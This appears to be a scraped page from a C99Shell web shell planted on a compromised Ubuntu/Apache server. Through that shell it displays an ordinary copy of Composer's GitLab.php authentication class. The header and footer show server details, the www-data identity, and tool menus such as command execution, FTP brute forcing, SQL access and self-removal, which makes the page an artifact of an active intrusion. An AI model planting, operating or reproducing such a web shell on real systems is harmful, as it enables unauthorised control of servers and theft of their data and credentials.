!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/composer/composer/src/Composer/Util/   drwxr-xr-x
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GitLab.php (6.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Composer.
 *
 * (c) Nils Adermann <naderman@naderman.de>
 *     Jordi Boggiano <j.boggiano@seld.be>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Composer\Util;

use 
Composer\IO\IOInterface;
use 
Composer\Config;
use 
Composer\Factory;
use 
Composer\Downloader\TransportException;

/**
 * @author Roshan Gautam <roshan.gautam@hotmail.com>
 */
class GitLab
{
    
/** @var IOInterface */
    
protected $io;
    
/** @var Config */
    
protected $config;
    
/** @var ProcessExecutor */
    
protected $process;
    
/** @var HttpDownloader */
    
protected $httpDownloader;

    
/**
     * Constructor.
     *
     * @param IOInterface     $io             The IO instance
     * @param Config          $config         The composer configuration
     * @param ProcessExecutor $process        Process instance, injectable for mocking
     * @param HttpDownloader  $httpDownloader Remote Filesystem, injectable for mocking
     */
    
public function __construct(IOInterface $ioConfig $configProcessExecutor $process nullHttpDownloader $httpDownloader null)
    {
        
$this->io $io;
        
$this->config $config;
        
$this->process $process ?: new ProcessExecutor($io);
        
$this->httpDownloader $httpDownloader ?: Factory::createHttpDownloader($this->io$config);
    }

    
/**
     * Attempts to authorize a GitLab domain via OAuth.
     *
     * @param string $originUrl The host this GitLab instance is located at
     *
     * @return bool true on success
     */
    
public function authorizeOAuth($originUrl)
    {
        
// before composer 1.9, origin URLs had no port number in them
        
$bcOriginUrl preg_replace('{:\d+}'''$originUrl);

        if (!
in_array($originUrl$this->config->get('gitlab-domains'), true) && !in_array($bcOriginUrl$this->config->get('gitlab-domains'), true)) {
            return 
false;
        }

        
// if available use token from git config
        
if (=== $this->process->execute('git config gitlab.accesstoken'$output)) {
            
$this->io->setAuthentication($originUrltrim($output), 'oauth2');

            return 
true;
        }

        
// if available use deploy token from git config
        
if (=== $this->process->execute('git config gitlab.deploytoken.user'$tokenUser) && === $this->process->execute('git config gitlab.deploytoken.token'$tokenPassword)) {
            
$this->io->setAuthentication($originUrltrim($tokenUser), trim($tokenPassword));

            return 
true;
        }

        
// if available use token from composer config
        
$authTokens $this->config->get('gitlab-token');

        if (isset(
$authTokens[$originUrl])) {
            
$token $authTokens[$originUrl];
        }

        if (isset(
$authTokens[$bcOriginUrl])) {
            
$token $authTokens[$bcOriginUrl];
        }

        if (isset(
$token)) {
            
$username is_array($token) && array_key_exists("username"$token) ? $token["username"] : $token;
            
$password is_array($token) && array_key_exists("token"$token) ? $token["token"] : 'private-token';
            
$this->io->setAuthentication($originUrl$username$password);

            return 
true;
        }

        return 
false;
    }

    
/**
     * Authorizes a GitLab domain interactively via OAuth.
     *
     * @param string $scheme    Scheme used in the origin URL
     * @param string $originUrl The host this GitLab instance is located at
     * @param string $message   The reason this authorization is required
     *
     * @throws \RuntimeException
     * @throws TransportException|\Exception
     *
     * @return bool true on success
     */
    
public function authorizeOAuthInteractively($scheme$originUrl$message null)
    {
        if (
$message) {
            
$this->io->writeError($message);
        }

        
$this->io->writeError(sprintf('A token will be created and stored in "%s", your password will never be stored'$this->config->getAuthConfigSource()->getName()));
        
$this->io->writeError('To revoke access to this token you can visit '.$scheme.'://'.$originUrl.'/profile/applications');

        
$attemptCounter 0;

        while (
$attemptCounter++ < 5) {
            try {
                
$response $this->createToken($scheme$originUrl);
            } catch (
TransportException $e) {
                
// 401 is bad credentials,
                // 403 is max login attempts exceeded
                
if (in_array($e->getCode(), array(403401))) {
                    if (
401 === $e->getCode()) {
                        
$response json_decode($e->getResponse(), true);
                        if (isset(
$response['error']) && $response['error'] === 'invalid_grant') {
                            
$this->io->writeError('Bad credentials. If you have two factor authentication enabled you will have to manually create a personal access token');
                        } else {
                            
$this->io->writeError('Bad credentials.');
                        }
                    } else {
                        
$this->io->writeError('Maximum number of login attempts exceeded. Please try again later.');
                    }

                    
$this->io->writeError('You can also manually create a personal access token enabling the "read_api" scope at '.$scheme.'://'.$originUrl.'/profile/personal_access_tokens');
                    
$this->io->writeError('Add it using "composer config --global --auth gitlab-token.'.$originUrl.' <token>"');

                    continue;
                }

                throw 
$e;
            }

            
$this->io->setAuthentication($originUrl$response['access_token'], 'oauth2');

            
// store value in user config in auth file
            
$this->config->getAuthConfigSource()->addConfigSetting('gitlab-oauth.'.$originUrl$response['access_token']);

            return 
true;
        }

        throw new 
\RuntimeException('Invalid GitLab credentials 5 times in a row, aborting.');
    }

    private function 
createToken($scheme$originUrl)
    {
        
$username $this->io->ask('Username: ');
        
$password $this->io->askAndHideAnswer('Password: ');

        
$headers = array('Content-Type: application/x-www-form-urlencoded');

        
$apiUrl $originUrl;
        
$data http_build_query(array(
            
'username' => $username,
            
'password' => $password,
            
'grant_type' => 'password',
        ), 
null'&');
        
$options = array(
            
'retry-auth-failure' => false,
            
'http' => array(
                
'method' => 'POST',
                
'header' => $headers,
                
'content' => $data,
            ),
        );

        
$token $this->httpDownloader->get($scheme.'://'.$apiUrl.'/oauth/token'$options)->decodeJson();

        
$this->io->writeError('Token successfully created');

        return 
$token;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--